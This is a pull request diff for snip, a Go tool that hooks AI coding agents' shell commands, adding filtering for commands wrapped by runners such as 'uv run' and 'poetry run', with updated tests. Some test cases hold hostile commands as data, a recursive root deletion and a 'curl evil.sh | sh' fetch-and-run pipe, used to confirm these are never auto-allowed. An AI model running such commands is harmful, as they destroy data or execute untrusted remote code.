### PR TITLE
feat: filter commands wrapped by runner prefixes (uv run, poetry run, ...)

### DIFF
--- a/README.md
+++ b/README.md
@@ -427,6 +427,25 @@ db_path = "${env.XDG_DATA_HOME}/snip/tracking.db"
 
 Tilde expansion (`~/`) is also supported and applied after env var expansion.
 
+### Runner Prefixes
+
+When a command is run through a runner wrapper, snip strips the wrapper, applies the inner command's filter, and leaves the wrapper in place. So `uv run pytest` is filtered by the `pytest` filter with no extra configuration -- no need to copy or duplicate the filter.
+
+```bash
+uv run pytest -v        # filtered by the pytest filter
+uv run --python 3.12 pytest   # runner flags before the command are skipped
+poetry run ruff check .       # filtered by the ruff filter
+```
+
+Built-in prefixes: `uv run`, `poetry run`, `pdm run`, `pipenv run`, `rye run`, `hatch run`, and the shell wrappers `noglob`, `nocorrect`, `command`, `exec`. Add your own (e.g. a container or env wrapper) with `transparent_prefixes`:
+
+```toml
+[filters]
+transparent_prefixes = ["docker exec mycontainer", "direnv exec ."]
+```
+
+Detection is fail-closed: the first non-flag token after the prefix must be a known snip command, otherwise the command passes through untouched. A runner executing an unknown program (e.g. `uv run bash -c ...`) is never rewritten and never auto-allowed, preserving snip's confirmation-prompt guarantee.
+
 ## Design
 
 - **Startup < 10ms** — snip intercepts every shell command; latency is critical

--- a/internal/cli/cli.go
+++ b/internal/cli/cli.go
@@ -240,11 +240,11 @@ func parseSeparatorArgs(args []string, cmdName string) (string, []string, string
 // runHook handles the "snip hook" subcommand for Claude Code PreToolUse.
 // Always returns 0 (graceful degradation).
 func runHook() int {
-	snipBin, commands, ok := loadHookContext()
+	snipBin, commands, prefixes, ok := loadHookContext()
 	if !ok {
 		return 0
 	}
-	_ = hook.Run(os.Stdin, os.Stdout, commands, snipBin)
+	_ = hook.Run(os.Stdin, os.Stdout, commands, prefixes, snipBin)
 	return 0
 }
 
@@ -252,11 +252,11 @@ func runHook() int {
 // Codex cannot rewrite the command in place, so the handler responds with
 // a deny + suggested rewrite. Always returns 0 (graceful degradation).
 func runHookCodex() int {
-	snipBin, commands, ok := loadHookContext()
+	snipBin, commands, prefixes, ok := loadHookContext()
 	if !ok {
 		return 0
 	}
-	_ = hook.RunCodex(os.Stdin, os.Stdout, commands, snipBin)
+	_ = hook.RunCodex(os.Stdin, os.Stdout, commands, prefixes, snipBin)
 	return 0
 }
 
@@ -265,28 +265,28 @@ func runHookCodex() int {
 // which mirrors Claude Code's hookSpecificOutput format. Always returns 0
 // (graceful degradation).
 func runHookPi() int {
-	snipBin, commands, ok := loadHookContext()
+	snipBin, commands, prefixes, ok := loadHookContext()
 	if !ok {
 		return 0
 	}
-	_ = hook.RunPi(os.Stdin, os.Stdout, commands, snipBin)
+	_ = hook.RunPi(os.Stdin, os.Stdout, commands, prefixes, snipBin)
 	return 0
 }
 
 // loadHookContext resolves the snip binary path and loads the filter
 // registry. Returns ok=false on any failure so callers can exit 0 silently.
-func loadHookContext() (snipBin string, commands []string, ok bool) {
+func loadHookContext() (snipBin string, commands []string, prefixes []hook.TransparentPrefix, ok bool) {
 	bin, err := os.Executable()
 	if err != nil {
-		return "", nil, false
+		return "", nil, nil, false
 	}
 	bin, err = filepath.EvalSymlinks(bin)
 	if err != nil {
-		return "", nil, false
+		return "", nil, nil, false
 	}
 	bin, err = filepath.Abs(bin)
 	if err != nil {
-		return "", nil, false
+		return "", nil, nil, false
 	}
 
 	cfg, err := config.Load()
@@ -296,11 +296,12 @@ func loadHookContext() (snipBin string, commands []string, ok bool) {
 
 	filters, err := filter.LoadAll(cfg.Filters.Dirs())
 	if err != nil {
-		return "", nil, false
+		return "", nil, nil, false
 	}
 
 	registry := filter.NewRegistry(filters)
-	return bin, registry.Commands(), true
+	prefixes = hook.MergeTransparentPrefixes(cfg.Filters.TransparentPrefixes)
+	return bin, registry.Commands(), prefixes, true
 }
 
 func runPipeline(command string, args []string, flags Flags) int {

--- a/internal/config/config.go
+++ b/internal/config/config.go
@@ -38,6 +38,10 @@ type FiltersConfig struct {
 	Global   FilterGlobalConfig        `toml:"global"`
 	Override map[string]FilterOverride `toml:"override"`
 	Bypass   FilterBypassConfig        `toml:"bypass"`
+	// TransparentPrefixes are wrapper commands (e.g. "poetry run",
+	// "docker exec ctr") that snip strips before routing so the inner command
+	// matches its filter. Built-in prefixes (uv run, ...) always apply too.
+	TransparentPrefixes []string `toml:"transparent_prefixes"`
 }
 
 // FilterGlobalConfig applies to all filters in the pipeline.

--- a/internal/hook/codex.go
+++ b/internal/hook/codex.go
@@ -22,7 +22,7 @@ const codexAgent = "codex"
 // limitation is lifted, this function can return updatedInput like Run does.
 //
 // Always returns nil; the caller must exit 0 (graceful degradation).
-func RunCodex(r io.Reader, w io.Writer, commands []string, snipBin string) error {
+func RunCodex(r io.Reader, w io.Writer, commands []string, prefixes []TransparentPrefix, snipBin string) error {
 	audit := hookaudit.Enabled()
 
 	data, err := io.ReadAll(r)
@@ -67,22 +67,36 @@ func RunCodex(r io.Reader, w io.Writer, commands []string, snipBin string) error
 	for _, c := range commands {
 		cmdSet[c] = struct{}{}
 	}
-	if _, ok := cmdSet[base]; !ok {
-		if audit {
-			hookaudit.Append(hookaudit.Event{
-				Timestamp: time.Now().UTC(),
-				Command:   ti.Command,
-				Base:      base,
-				Matched:   false,
-				Rewritten: false,
-				Agent:     codexAgent,
-			})
+
+	restOfCmd := ti.Command[len(firstSegment):]
+
+	// Transparent runner prefix (e.g. "uv run pytest"): suggest wrapping the
+	// inner command so its filter applies, leaving the prefix in place. Only when
+	// a known inner command is located; otherwise fall back to the plain base
+	// check below.
+	var suggested string
+	if tp, restAfter, ok := matchTransparentPrefix(bareCmd, prefixes); ok {
+		if before, _, found := LocateInner(restAfter, cmdSet, tp.ValueFlags, tp.SkipFlags); found {
+			suggested = prefix + envVars + tp.Prefix + " " + before + quotedBin + " run -- " + restAfter[len(before):] + restOfCmd
 		}
-		return nil
 	}
 
-	rest := ti.Command[len(firstSegment):]
-	suggested := prefix + envVars + quotedBin + " run -- " + bareCmd + rest
+	if suggested == "" {
+		if _, ok := cmdSet[base]; !ok {
+			if audit {
+				hookaudit.Append(hookaudit.Event{
+					Timestamp: time.Now().UTC(),
+					Command:   ti.Command,
+					Base:      base,
+					Matched:   false,
+					Rewritten: false,
+					Agent:     codexAgent,
+				})
+			}
+			return nil
+		}
+		suggested = prefix + envVars + quotedBin + " run -- " + bareCmd + restOfCmd
+	}
 
 	reason := fmt.Sprintf("snip can filter this command. Re-run as: %s", suggested)
 

--- a/internal/hook/codex_test.go
+++ b/internal/hook/codex_test.go
@@ -39,7 +39,7 @@ func TestRunCodexDeniesSupportedCommand(t *testing.T) {
 
 	input := makePayload("Bash", "git log -10")
 	var out bytes.Buffer
-	if err := RunCodex(strings.NewReader(input), &out, commands, snipBin); err != nil {
+	if err := RunCodex(strings.NewReader(input), &out, commands, nil, snipBin); err != nil {
 		t.Fatalf("RunCodex: %v", err)
 	}
 	if out.Len() == 0 {
@@ -59,7 +59,7 @@ func TestRunCodexUnsupportedPassthrough(t *testing.T) {
 
 	input := makePayload("Bash", "ls -la")
 	var out bytes.Buffer
-	if err := RunCodex(strings.NewReader(input), &out, commands, snipBin); err != nil {
+	if err := RunCodex(strings.NewReader(input), &out, commands, nil, snipBin); err != nil {
 		t.Fatalf("RunCodex: %v", err)
 	}
 	if out.Len() != 0 {
@@ -74,7 +74,7 @@ func TestRunCodexAlreadyRewritten(t *testing.T) {
 	already := `"/usr/local/bin/snip" run -- git status`
 	input := makePayload("Bash", already)
 	var out bytes.Buffer
-	if err := RunCodex(strings.NewReader(input), &out, commands, snipBin); err != nil {
+	if err := RunCodex(strings.NewReader(input), &out, commands, nil, snipBin); err != nil {
 		t.Fatalf("RunCodex: %v", err)
 	}
 	if out.Len() != 0 {
@@ -88,7 +88,7 @@ func TestRunCodexMultiSegmentSuggestionIncludesTail(t *testing.T) {
 
 	input := makePayload("Bash", "git add . && git commit -m 'fix'")
 	var out bytes.Buffer
-	if err := RunCodex(strings.NewReader(input), &out, commands, snipBin); err != nil {
+	if err := RunCodex(strings.NewReader(input), &out, commands, nil, snipBin); err != nil {
 		t.Fatalf("RunCodex: %v", err)
 	}
 
@@ -105,7 +105,7 @@ func TestRunCodexEnvVarPrefix(t *testing.T) {
 
 	input := makePayload("Bash", "CGO_ENABLED=0 go test ./...")
 	var out bytes.Buffer
-	if err := RunCodex(strings.NewReader(input), &out, commands, snipBin); err != nil {
+	if err := RunCodex(strings.NewReader(input), &out, commands, nil, snipBin); err != nil {
 		t.Fatalf("RunCodex: %v", err)
 	}
 
@@ -127,7 +127,7 @@ func TestRunCodexNonBashTool(t *testing.T) {
 	data, _ := json.Marshal(payload)
 
 	var out bytes.Buffer
-	if err := RunCodex(strings.NewReader(string(data)), &out, commands, snipBin); err != nil {
+	if err := RunCodex(strings.NewReader(string(data)), &out, commands, nil, snipBin); err != nil {
 		t.Fatalf("RunCodex: %v", err)
 	}
 	if out.Len() != 0 {
@@ -141,7 +141,7 @@ func TestRunCodexEmptyCommand(t *testing.T) {
 
 	input := makePayload("Bash", "")
 	var out bytes.Buffer
-	if err := RunCodex(strings.NewReader(input), &out, commands, snipBin); err != nil {
+	if err := RunCodex(strings.NewReader(input), &out, commands, nil, snipBin); err != nil {
 		t.Fatalf("RunCodex: %v", err)
 	}
 	if out.Len() != 0 {
@@ -154,7 +154,7 @@ func TestRunCodexMalformedJSON(t *testing.T) {
 	snipBin := "/usr/local/bin/snip"
 
 	var out bytes.Buffer
-	if err := RunCodex(strings.NewReader("{invalid json"), &out, commands, snipBin); err != nil {
+	if err := RunCodex(strings.NewReader("{invalid json"), &out, commands, nil, snipBin); err != nil {
 		t.Fatalf("RunCodex must not error on malformed JSON: %v", err)
 	}
 	if out.Len() != 0 {

--- a/internal/hook/hook.go
+++ b/internal/hook/hook.go
@@ -29,7 +29,7 @@ type toolInput struct {
 //
 // Returns nil on success. Errors are returned but the caller should always
 // exit 0 (graceful degradation).
-func Run(r io.Reader, w io.Writer, commands []string, snipBin string) error {
+func Run(r io.Reader, w io.Writer, commands []string, prefixes []TransparentPrefix, snipBin string) error {
 	audit := hookaudit.Enabled()
 
 	data, err := io.ReadAll(r)
@@ -68,7 +68,7 @@ func Run(r io.Reader, w io.Writer, commands []string, snipBin string) error {
 	}
 
 	// Rewrite every runnable segment whose base command snip supports.
-	res := RewriteCommand(ti.Command, cmdSet, snipBin)
+	res := RewriteCommand(ti.Command, cmdSet, prefixes, snipBin)
 	if !res.Changed {
 		// Audit: nothing matched (or already rewritten).
 		if audit {

--- a/internal/hook/hook_test.go
+++ b/internal/hook/hook_test.go
@@ -33,7 +33,7 @@ func TestRunRewriteSupported(t *testing.T) {
 
 	input := makePayload("Bash", "git log -10")
 	var out bytes.Buffer
-	err := Run(strings.NewReader(input), &out, commands, snipBin)
+	err := Run(strings.NewReader(input), &out, commands, nil, snipBin)
 	if err != nil {
 		t.Fatalf("Run: %v", err)
 	}
@@ -55,7 +55,7 @@ func TestRunUnsupportedPassthrough(t *testing.T) {
 
 	input := makePayload("Bash", "ls -la")
 	var out bytes.Buffer
-	err := Run(strings.NewReader(input), &out, commands, snipBin)
+	err := Run(strings.NewReader(input), &out, commands, nil, snipBin)
 	if err != nil {
 		t.Fatalf("Run: %v", err)
 	}
@@ -72,7 +72,7 @@ func TestRunAlreadyRewritten(t *testing.T) {
 	alreadyRewritten := `"/usr/local/bin/snip" run -- git status`
 	input := makePayload("Bash", alreadyRewritten)
 	var out bytes.Buffer
-	err := Run(strings.NewReader(input), &out, commands, snipBin)
+	err := Run(strings.NewReader(input), &out, commands, nil, snipBin)
 	if err != nil {
 		t.Fatalf("Run: %v", err)
 	}
@@ -106,7 +106,7 @@ func TestRunMultiSegment(t *testing.T) {
 
 	input := makePayload("Bash", "git add . && git commit -m 'fix'")
 	var out bytes.Buffer
-	if err := Run(strings.NewReader(input), &out, commands, snipBin); err != nil {
+	if err := Run(strings.NewReader(input), &out, commands, nil, snipBin); err != nil {
 		t.Fatalf("Run: %v", err)
 	}
 
@@ -140,7 +140,7 @@ func TestRunUnattestablePassthrough(t *testing.T) {
 		t.Run(tc.name, func(t *testing.T) {
 			input := makePayload("Bash", tc.command)
 			var out bytes.Buffer
-			if err := Run(strings.NewReader(input), &out, commands, snipBin); err != nil {
+			if err := Run(strings.NewReader(input), &out, commands, nil, snipBin); err != nil {
 				t.Fatalf("Run: %v", err)
 			}
 			if out.Len() != 0 {
@@ -174,7 +174,7 @@ func TestRunMixedRewriteNoAllow(t *testing.T) {
 		t.Run(tc.name, func(t *testing.T) {
 			input := makePayload("Bash", tc.command)
 			var out bytes.Buffer
-			if err := Run(strings.NewReader(input), &out, commands, snipBin); err != nil {
+			if err := Run(strings.NewReader(input), &out, commands, nil, snipBin); err != nil {
 				t.Fatalf("Run: %v", err)
 			}
 			if out.Len() == 0 {
@@ -196,7 +196,7 @@ func TestRunEnvVarPrefix(t *testing.T) {
 
 	input := makePayload("Bash", "CGO_ENABLED=0 go test ./...")
 	var out bytes.Buffer
-	err := Run(strings.NewReader(input), &out, commands, snipBin)
+	err := Run(strings.NewReader(input), &out, commands, nil, snipBin)
 	if err != nil {
 		t.Fatalf("Run: %v", err)
 	}
@@ -214,7 +214,7 @@ func TestRunEmptyCommand(t *testing.T) {
 
 	input := makePayload("Bash", "")
 	var out bytes.Buffer
-	err := Run(strings.NewReader(input), &out, commands, snipBin)
+	err := Run(strings.NewReader(input), &out, commands, nil, snipBin)
 	if err != nil {
 		t.Fatalf("Run: %v", err)
 	}
@@ -235,7 +235,7 @@ func TestRunNonBashTool(t *testing.T) {
 	data, _ := json.Marshal(payload)
 
 	var out bytes.Buffer
-	err := Run(strings.NewReader(string(data)), &out, commands, snipBin)
+	err := Run(strings.NewReader(string(data)), &out, commands, nil, snipBin)
 	if err != nil {
 		t.Fatalf("Run: %v", err)
 	}
@@ -250,7 +250,7 @@ func TestRunMalformedJSON(t *testing.T) {
 	snipBin := "/usr/local/bin/snip"
 
 	var out bytes.Buffer
-	err := Run(strings.NewReader("{invalid json"), &out, commands, snipBin)
+	err := Run(strings.NewReader("{invalid json"), &out, commands, nil, snipBin)
 	if err != nil {
 		t.Fatalf("Run should not return error on malformed JSON: %v", err)
 	}
@@ -266,7 +266,7 @@ func TestRunPermissionDecision(t *testing.T) {
 
 	input := makePayload("Bash", "git status")
 	var out bytes.Buffer
-	_ = Run(strings.NewReader(input), &out, commands, snipBin)
+	_ = Run(strings.NewReader(input), &out, commands, nil, snipBin)
 
 	var result map[string]any
 	if err := json.Unmarshal(out.Bytes(), &result); err != nil {
@@ -288,7 +288,7 @@ func TestRunMultipleEnvVars(t *testing.T) {
 
 	input := makePayload("Bash", "FOO=1 BAR=2 make build")
 	var out bytes.Buffer
-	err := Run(strings.NewReader(input), &out, commands, snipBin)
+	err := Run(strings.NewReader(input), &out, commands, nil, snipBin)
 	if err != nil {
 		t.Fatalf("Run: %v", err)
 	}
@@ -298,4 +298,41 @@ func TestRunMultipleEnvVars(t *testing.T) {
 	if rewritten != want {
 		t.Errorf("rewritten = %q, want %q", rewritten, want)
 	}
+}
+
+// TestRunTransparentPrefix verifies the full hook flow for a runner-wrapped
+// command: "uv run pytest" is rewritten so the pytest filter applies and is
+// auto-allowed (inner command is known), while "poetry run bash -c ..." is
+// passed through untouched so Claude Code still prompts (#88).
+func TestRunTransparentPrefix(t *testing.T) {
+	commands := []string{"pytest"}
+	snipBin := "/usr/local/bin/snip"
+	prefixes := MergeTransparentPrefixes(nil)
+
+	t.Run("uv run pytest is rewritten and allowed", func(t *testing.T) {
+		input := makePayload("Bash", "uv run --python 3.12 pytest -v")
+		var out bytes.Buffer
+		if err := Run(strings.NewReader(input), &out, commands, prefixes, snipBin); err != nil {
+			t.Fatalf("Run: %v", err)
+		}
+		rewritten := extractRewrittenCommand(t, out.String())
+		want := `uv run --python 3.12 "/usr/local/bin/snip" run -- pytest -v`
+		if rewritten != want {
+			t.Errorf("rewritten = %q, want %q", rewritten, want)
+		}
+		if pd := permissionDecisionOf(t, out.String()); pd != "allow" {
+			t.Errorf("permissionDecision = %q, want allow", pd)
+		}
+	})
+
+	t.Run("runner with unknown inner is passed through", func(t *testing.T) {
+		input := makePayload("Bash", "poetry run bash -c 'rm -rf /'")
+		var out bytes.Buffer
+		if err := Run(strings.NewReader(input), &out, commands, prefixes, snipBin); err != nil {
+			t.Fatalf("Run: %v", err)
+		}
+		if out.Len() != 0 {
+			t.Errorf("expected passthrough (no output), got: %s", out.String())
+		}
+	})
 }

--- a/internal/hook/pi.go
+++ b/internal/hook/pi.go
@@ -28,7 +28,7 @@ const piToolName = "bash"
 //
 // Returns nil on success. Errors are returned but the caller should always
 // exit 0 (graceful degradation).
-func RunPi(r io.Reader, w io.Writer, commands []string, snipBin string) error {
+func RunPi(r io.Reader, w io.Writer, commands []string, prefixes []TransparentPrefix, snipBin string) error {
 	audit := hookaudit.Enabled()
 
 	data, err := io.ReadAll(r)
@@ -64,7 +64,7 @@ func RunPi(r io.Reader, w io.Writer, commands []string, snipBin string) error {
 		cmdSet[c] = struct{}{}
 	}
 
-	res := RewriteCommand(ti.Command, cmdSet, snipBin)
+	res := RewriteCommand(ti.Command, cmdSet, prefixes, snipBin)
 	if !res.Changed {
 		if audit {
 			base := firstBase(ti.Command)

--- a/internal/hook/pi_test.go
+++ b/internal/hook/pi_test.go
@@ -13,7 +13,7 @@ func TestRunPiRewriteSupported(t *testing.T) {
 
 	input := makePayload("bash", "git log -10")
 	var out bytes.Buffer
-	if err := RunPi(strings.NewReader(input), &out, commands, snipBin); err != nil {
+	if err := RunPi(strings.NewReader(input), &out, commands, nil, snipBin); err != nil {
 		t.Fatalf("RunPi: %v", err)
 	}
 	if out.Len() == 0 {
@@ -35,7 +35,7 @@ func TestRunPiIgnoresCapitalizedBash(t *testing.T) {
 
 	input := makePayload("Bash", "git log -10")
 	var out bytes.Buffer
-	if err := RunPi(strings.NewReader(input), &out, commands, snipBin); err != nil {
+	if err := RunPi(strings.NewReader(input), &out, commands, nil, snipBin); err != nil {
 		t.Fatalf("RunPi: %v", err)
 	}
 	if out.Len() != 0 {
@@ -49,7 +49,7 @@ func TestRunPiUnsupportedPassthrough(t *testing.T) {
 
 	input := makePayload("bash", "ls -la")
 	var out bytes.Buffer
-	if err := RunPi(strings.NewReader(input), &out, commands, snipBin); err != nil {
+	if err := RunPi(strings.NewReader(input), &out, commands, nil, snipBin); err != nil {
 		t.Fatalf("RunPi: %v", err)
 	}
 	if out.Len() != 0 {
@@ -64,7 +64,7 @@ func TestRunPiAlreadyRewritten(t *testing.T) {
 	already := `"/usr/local/bin/snip" run -- git status`
 	input := makePayload("bash", already)
 	var out bytes.Buffer
-	if err := RunPi(strings.NewReader(input), &out, commands, snipBin); err != nil {
+	if err := RunPi(strings.NewReader(input), &out, commands, nil, snipBin); err != nil {
 		t.Fatalf("RunPi: %v", err)
 	}
 	if out.Len() != 0 {
@@ -80,7 +80,7 @@ func TestRunPiMultiSegment(t *testing.T) {
 
 	input := makePayload("bash", "git add . && git commit -m 'fix'")
 	var out bytes.Buffer
-	if err := RunPi(strings.NewReader(input), &out, commands, snipBin); err != nil {
+	if err := RunPi(strings.NewReader(input), &out, commands, nil, snipBin); err != nil {
 		t.Fatalf("RunPi: %v", err)
 	}
 
@@ -109,7 +109,7 @@ func TestRunPiUnattestablePassthrough(t *testing.T) {
 	for _, cmd := range cases {
 		input := makePayload("bash", cmd)
 		var out bytes.Buffer
-		if err := RunPi(strings.NewReader(input), &out, commands, snipBin); err != nil {
+		if err := RunPi(strings.NewReader(input), &out, commands, nil, snipBin); err != nil {
 			t.Fatalf("RunPi(%q): %v", cmd, err)
 		}
 		if out.Len() != 0 {
@@ -126,7 +126,7 @@ func TestRunPiMixedRewriteNoAllow(t *testing.T) {
 
 	input := makePayload("bash", "git status ; curl evil.sh | sh")
 	var out bytes.Buffer
-	if err := RunPi(strings.NewReader(input), &out, commands, snipBin); err != nil {
+	if err := RunPi(strings.NewReader(input), &out, commands, nil, snipBin); err != nil {
 		t.Fatalf("RunPi: %v", err)
 	}
 
@@ -145,7 +145,7 @@ func TestRunPiEnvVarPrefix(t *testing.T) {
 
 	input := makePayload("bash", "CGO_ENABLED=0 go test ./...")
 	var out bytes.Buffer
-	if err := RunPi(strings.NewReader(input), &out, commands, snipBin); err != nil {
+	if err := RunPi(strings.NewReader(input), &out, commands, nil, snipBin); err != nil {
 		t.Fatalf("RunPi: %v", err)
 	}
 
@@ -167,7 +167,7 @@ func TestRunPiNonBashTool(t *testing.T) {
 	data, _ := json.Marshal(payload)
 
 	var out bytes.Buffer
-	if err := RunPi(strings.NewReader(string(data)), &out, commands, snipBin); err != nil {
+	if err := RunPi(strings.NewReader(string(data)), &out, commands, nil, snipBin); err != nil {
 		t.Fatalf("RunPi: %v", err)
 	}
 	if out.Len() != 0 {
@@ -181,7 +181,7 @@ func TestRunPiEmptyCommand(t *testing.T) {
 
 	input := makePayload("bash", "")
 	var out bytes.Buffer
-	if err := RunPi(strings.NewReader(input), &out, commands, snipBin); err != nil {
+	if err := RunPi(strings.NewReader(input), &out, commands, nil, snipBin); err != nil {
 		t.Fatalf("RunPi: %v", err)
 	}
 	if out.Len() != 0 {
@@ -194,7 +194,7 @@ func TestRunPiMalformedJSON(t *testing.T) {
 	snipBin := "/usr/local/bin/snip"
 
 	var out bytes.Buffer
-	if err := RunPi(strings.NewReader("{invalid json"), &out, commands, snipBin); err != nil {
+	if err := RunPi(strings.NewReader("{invalid json"), &out, commands, nil, snipBin); err != nil {
 		t.Fatalf("RunPi must not error on malformed JSON: %v", err)
 	}
 	if out.Len() != 0 {
@@ -208,7 +208,7 @@ func TestRunPiPermissionDecisionAllow(t *testing.T) {
 
 	input := makePayload("bash", "git status")
 	var out bytes.Buffer
-	_ = RunPi(strings.NewReader(input), &out, commands, snipBin)
+	_ = RunPi(strings.NewReader(input), &out, commands, nil, snipBin)
 
 	var result map[string]any
 	if err := json.Unmarshal(out.Bytes(), &result); err != nil {

--- a/internal/hook/rewrite.go
+++ b/internal/hook/rewrite.go
@@ -32,7 +32,7 @@ type RewriteResult struct {
 // The caller must reject commands containing unverifiable constructs
 // (HasUnverifiableConstruct) before calling this, so cmd here is free of command
 // substitution and carriage returns.
-func RewriteCommand(cmd string, cmdSet map[string]struct{}, snipBin string) RewriteResult {
+func RewriteCommand(cmd string, cmdSet map[string]struct{}, prefixes []TransparentPrefix, snipBin string) RewriteResult {
 	quotedBin := fmt.Sprintf("%q", snipBin)
 
 	var b strings.Builder
@@ -42,7 +42,7 @@ func RewriteCommand(cmd string, cmdSet map[string]struct{}, snipBin string) Rewr
 	allKnown := true
 
 	flush := func(group string) {
-		out, headKnown, hasTail := rewriteGroup(group, cmdSet, quotedBin, snipBin)
+		out, headKnown, hasTail := rewriteGroup(group, cmdSet, prefixes, quotedBin, snipBin)
 		b.WriteString(out)
 		if out != group {
 			changed = true
@@ -114,7 +114,7 @@ func RewriteCommand(cmd string, cmdSet map[string]struct{}, snipBin string) Rewr
 // between two sequential boundaries). It returns the rewritten group, whether
 // the head is a known/attested base command, and whether the group has a
 // non-empty pipeline tail (extra stages that were left uninspected).
-func rewriteGroup(group string, cmdSet map[string]struct{}, quotedBin, snipBin string) (out string, headKnown, hasTail bool) {
+func rewriteGroup(group string, cmdSet map[string]struct{}, prefixes []TransparentPrefix, quotedBin, snipBin string) (out string, headKnown, hasTail bool) {
 	head, tail := splitFirstPipe(group)
 	hasTail = strings.TrimSpace(tail) != ""
 
@@ -129,6 +129,20 @@ func rewriteGroup(group string, cmdSet map[string]struct{}, quotedBin, snipBin s
 	if base == quotedBin || base == snipBin ||
 		strings.HasPrefix(trimmed, quotedBin) || strings.HasPrefix(trimmed, snipBin) {
 		return group, true, hasTail
+	}
+
+	// Transparent runner prefix (e.g. "uv run pytest"): strip the prefix, locate
+	// the inner command, and wrap the inner command so its filter applies. The
+	// prefix is re-prepended unchanged so the wrapped snip still runs inside the
+	// runner's environment. Attempted only when the inner command is a known snip
+	// command; otherwise fall through to the normal base check below. Because the
+	// inner base must be in cmdSet, a runner executing an unknown program
+	// (e.g. "uv run bash -c ...") is never rewritten here and never auto-allowed.
+	if tp, rest, ok := matchTransparentPrefix(bareCmd, prefixes); ok {
+		if before, _, found := LocateInner(rest, cmdSet, tp.ValueFlags, tp.SkipFlags); found {
+			wrappedHead := prefix + envVars + tp.Prefix + " " + before + quotedBin + " run -- " + rest[len(before):]
+			return wrappedHead + tail, true, hasTail
+		}
 	}
 
 	if _, ok := cmdSet[base]; !ok {

--- a/internal/hook/rewrite_test.go
+++ b/internal/hook/rewrite_test.go
@@ -80,7 +80,156 @@ func TestRewriteCommand(t *testing.T) {
 
 	for _, tc := range cases {
 		t.Run(tc.name, func(t *testing.T) {
-			res := RewriteCommand(tc.cmd, cmdSet, bin)
+			res := RewriteCommand(tc.cmd, cmdSet, nil, bin)
+			if res.Command != tc.want {
+				t.Errorf("Command = %q, want %q", res.Command, tc.want)
+			}
+			if res.Changed != tc.changed {
+				t.Errorf("Changed = %v, want %v", res.Changed, tc.changed)
+			}
+			if res.AllKnown != tc.allKnown {
+				t.Errorf("AllKnown = %v, want %v", res.AllKnown, tc.allKnown)
+			}
+		})
+	}
+}
+
+// TestRewriteTransparentPrefix covers runner-prefix unwrapping: "uv run pytest"
+// is rewritten so the pytest filter applies, while the runner prefix is left in
+// place. The inner command must be a known snip command for the rewrite (and any
+// auto-allow) to happen; an unknown inner program falls through (#88).
+func TestRewriteTransparentPrefix(t *testing.T) {
+	const bin = "/usr/local/bin/snip"
+	cmdSet := map[string]struct{}{"git": {}, "pytest": {}, "ruff": {}}
+	builtin := MergeTransparentPrefixes(nil)
+	withDocker := MergeTransparentPrefixes([]string{"docker exec ctr"})
+
+	cases := []struct {
+		name     string
+		cmd      string
+		prefixes []TransparentPrefix
+		want     string
+		changed  bool
+		allKnown bool
+	}{
+		{
+			name:     "uv run pytest",
+			cmd:      "uv run pytest tests/",
+			prefixes: builtin,
+			want:     `uv run "/usr/local/bin/snip" run -- pytest tests/`,
+			changed:  true,
+			allKnown: true,
+		},
+		{
+			name:     "uv run with value flag",
+			cmd:      "uv run --python 3.12 pytest -v",
+			prefixes: builtin,
+			want:     `uv run --python 3.12 "/usr/local/bin/snip" run -- pytest -v`,
+			changed:  true,
+			allKnown: true,
+		},
+		{
+			name:     "uv run with boolean flag",
+			cmd:      "uv run --frozen pytest",
+			prefixes: builtin,
+			want:     `uv run --frozen "/usr/local/bin/snip" run -- pytest`,
+			changed:  true,
+			allKnown: true,
+		},
+		{
+			name:     "poetry run ruff (builtin)",
+			cmd:      "poetry run ruff check .",
+			prefixes: builtin,
+			want:     `poetry run "/usr/local/bin/snip" run -- ruff check .`,
+			changed:  true,
+			allKnown: true,
+		},
+		{
+			name:     "user-configured docker exec",
+			cmd:      "docker exec ctr pytest -q",
+			prefixes: withDocker,
+			want:     `docker exec ctr "/usr/local/bin/snip" run -- pytest -q`,
+			changed:  true,
+			allKnown: true,
+		},
+		{
+			name:     "compound runner and direct",
+			cmd:      "uv run pytest && ruff check",
+			prefixes: builtin,
+			want:     `uv run "/usr/local/bin/snip" run -- pytest && "/usr/local/bin/snip" run -- ruff check`,
+			changed:  true,
+			allKnown: true,
+		},
+		{
+			// Inner command is not a known snip command: the runner (poetry) is
+			// also unknown, so nothing is rewritten and nothing is auto-allowed.
+			name:     "unknown inner not rewritten",
+			cmd:      "poetry run bash -c 'rm -rf /'",
+			prefixes: builtin,
+			want:     "poetry run bash -c 'rm -rf /'",
+			changed:  false,
+			allKnown: false,
+		},
+		{
+			// Unrecognized value flag: its value (highest) is treated as the inner
+			// command, is unknown, so it fails closed rather than guessing.
+			name:     "unknown value flag fails closed",
+			cmd:      "poetry run --resolution highest pytest",
+			prefixes: builtin,
+			want:     "poetry run --resolution highest pytest",
+			changed:  false,
+			allKnown: false,
+		},
+		{
+			name:     "prefix alone is not rewritten",
+			cmd:      "poetry run",
+			prefixes: builtin,
+			want:     "poetry run",
+			changed:  false,
+			allKnown: false,
+		},
+		{
+			// "uv run echo pytest": echo is not a known command, so pytest (an
+			// argument to echo) must not be treated as the target.
+			name:     "argument not mistaken for command",
+			cmd:      "poetry run echo pytest",
+			prefixes: builtin,
+			want:     "poetry run echo pytest",
+			changed:  false,
+			allKnown: false,
+		},
+		{
+			// Env-var prefix is preserved ahead of the runner.
+			name:     "env prefix preserved",
+			cmd:      "PYTHONPATH=. uv run pytest",
+			prefixes: builtin,
+			want:     `PYTHONPATH=. uv run "/usr/local/bin/snip" run -- pytest`,
+			changed:  true,
+			allKnown: true,
+		},
+		{
+			// "command -v pytest" is a non-executing lookup, not an exec wrapper:
+			// the mode flag must block the rewrite (shell wrapper, SkipFlags=false).
+			name:     "command -v lookup not rewritten",
+			cmd:      "command -v pytest",
+			prefixes: builtin,
+			want:     "command -v pytest",
+			changed:  false,
+			allKnown: false,
+		},
+		{
+			name:     "command direct is rewritten",
+			cmd:      "command pytest -q",
+			prefixes: builtin,
+			want:     `command "/usr/local/bin/snip" run -- pytest -q`,
+			changed:  true,
+			allKnown: true,
+		},
+	}
+
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			res := RewriteCommand(tc.cmd, cmdSet, tc.prefixes, bin)
 			if res.Command != tc.want {
 				t.Errorf("Command = %q, want %q", res.Command, tc.want)
 			}

--- a/internal/hook/transparent.go
+++ b/internal/hook/transparent.go
@@ -1,0 +1,196 @@
+package hook
+
+import "strings"
+
+// TransparentPrefix is a wrapper command that does not change *what* program
+// runs, only *how* it runs (e.g. "uv run", "poetry run", "docker exec ctr").
